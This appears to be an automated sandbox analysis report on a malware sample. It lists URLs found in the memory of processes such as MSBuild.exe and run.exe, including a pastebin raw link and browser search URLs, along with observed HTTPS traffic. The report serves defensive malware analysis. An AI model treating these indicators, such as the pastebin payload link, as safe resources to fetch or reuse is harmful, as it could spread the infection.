Source: u42w.0.exe, u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u42w.0.exe, 00000001.00000002.2117404121.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u42w.3.exe, 00000005.00000003.2038133988.00000000025F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: u42w.3.exe, 00000005.00000003.2040498563.0000000000B97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC
Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938981217.00000173F3C1D000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 169.150.236.97:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49762 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

